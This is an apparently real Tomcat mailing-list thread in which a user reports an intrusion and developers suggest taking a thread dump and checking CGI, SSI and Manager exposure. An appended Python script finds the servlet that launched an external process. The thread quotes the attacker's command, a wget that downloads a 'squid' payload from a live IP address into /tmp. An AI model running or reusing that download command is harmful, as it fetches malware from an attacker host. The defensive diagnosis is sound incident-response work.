Ok, I will do the following:

1) thread dump of the running tomcat instance
2) Pastebin the running tomcat config

I think by midday I will have all the info. Thanks all for replying to me and for all the responses.

Regards,
Leonardo

Regards,
Leonardo Santagostini
<http://ar.linkedin.com/in/santagostini>

2014-04-30 10:55 GMT-03:00 Christopher Schultz <ch...@christopherschultz.net>:

> Konstantin,
>
> On 4/29/14, 4:54 PM, Konstantin Kolinko wrote:
> > 2014-04-30 0:41 GMT+04:00 Leonardo Santagostini <lsantagost...@gmail.com>:
> >> Hello Dan,
> >>
> >> Nope, the attacker is executing locally the following
> >>
> >> tomcat 8882 1 0 Apr27 ? 00:00:00 sh /tmp/4.sh
> >> tomcat 8893 8882 0 Apr27 ? 00:00:00 wget http://218.199.102.59/.xy/squid32 -O /tmp/squid
> >>
> >> And then it launches squid, which tries to connect via ssh to various places.
> >>
> >> Right now it's time to leave the office, but in a few hours I will paste in pastebin
> >> access logs, config files, whatever you tell me.
> >>
> >> This is my pstree
> >>
> >> [root@arcbaappvrt05 apache-tomcat-7.0.53]# pstree
> >> init─┬─atd
> >>      ├─java─┬─sh───wget
> >>      │      └─263*[{java}]
> >
> > sh launched by tomcat's java?
>
> Yes: please verify that it's the JVM running Tomcat, and not just any JVM process.
>
> > Take a thread dump:
> > https://wiki.apache.org/tomcat/HowTo#How_do_I_obtain_a_thread_dump_of_my_running_webapp_.3F
> >
> > It shall show what is the stacktrace in the thread that launched the external process.
>
> +1
>
> The only things that ship with Tomcat that call Process.exec() are the CGI servlet and SSI,
> both of which are disabled by default. So, either you have an insecure CGI/SSI configuration,
> your web application has a vulnerability, or you have deployed something like the Manager
> application and improperly secured it.
>
> A classic example of such an intrusion might be that someone got a foothold elsewhere into
> your network, and the Manager web application is not properly secured with a password, etc.
> -chris
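Added example, not from the thread or from Tomcat: a small Python triage script that does what Konstantin and Chris suggest, parsing a jstack-style thread dump to find threads sitting in Process.exec() and reporting the first non-JDK frame, i.e. the servlet or webapp class that launched the external process. The dump text, thread ids and the `com.example.legacy.ReportServlet` class are constructed for the example.

```python
import re

# JDK frames meaning "this thread is launching an external process" (JDK 7/8 names),
# and package prefixes skipped when looking for the first non-JDK caller above them.
EXEC_FRAMES = ("java.lang.Runtime.exec", "java.lang.ProcessBuilder.start",
               "java.lang.ProcessImpl.", "java.lang.UNIXProcess.")
JDK_PREFIXES = ("java.", "javax.", "sun.", "jdk.")
THREAD_HEADER = re.compile(r'^"(?P<name>[^"]+)"')

# Constructed jstack-style dump (not from the thread): one request thread is inside
# Runtime.exec, called from a hypothetical webapp servlet; the other is just reading.
SAMPLE_DUMP = '''\
"http-bio-8080-exec-3" daemon prio=10 tid=0x00007f3c1c0a1000 nid=0x1f2a runnable
   java.lang.Thread.State: RUNNABLE
        at java.lang.UNIXProcess.forkAndExec(Native Method)
        at java.lang.UNIXProcess.<init>(UNIXProcess.java:135)
        at java.lang.ProcessImpl.start(ProcessImpl.java:130)
        at java.lang.ProcessBuilder.start(ProcessBuilder.java:1022)
        at java.lang.Runtime.exec(Runtime.java:617)
        at com.example.legacy.ReportServlet.doGet(ReportServlet.java:88)
        at javax.servlet.http.HttpServlet.service(HttpServlet.java:620)
        at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:208)

"http-bio-8080-exec-4" daemon prio=10 tid=0x00007f3c1c0a3000 nid=0x1f2b runnable
   java.lang.Thread.State: RUNNABLE
        at java.net.SocketInputStream.socketRead0(Native Method)
        at org.apache.coyote.http11.Http11Processor.process(Http11Processor.java:1012)
'''

def parse_threads(dump):
    """Map thread name -> stack frames (innermost first) from a jstack dump."""
    threads, current = {}, None
    for line in dump.splitlines():
        m = THREAD_HEADER.match(line)
        if m:
            current = m.group("name")
            threads[current] = []
        elif current is not None and line.strip().startswith("at "):
            threads[current].append(line.strip()[3:])
    return threads

def find_exec_callers(dump):
    """(thread, first non-JDK caller frame) for each thread inside Process.exec; the caller
    is e.g. org.apache.catalina.servlets.CGIServlet, org.apache.catalina.ssi.* or webapp code."""
    hits = []
    for name, frames in parse_threads(dump).items():
        if any(f.startswith(EXEC_FRAMES) for f in frames):
            caller = next((f for f in frames if not f.startswith(JDK_PREFIXES)), frames[-1])
            hits.append((name, caller))
    return hits
```

Run it over a real dump with `find_exec_callers(open("threaddump.txt").read())`; a caller in `org.apache.catalina.servlets` or `org.apache.catalina.ssi` points at the CGI/SSI configuration, anything else points at the deployed webapp.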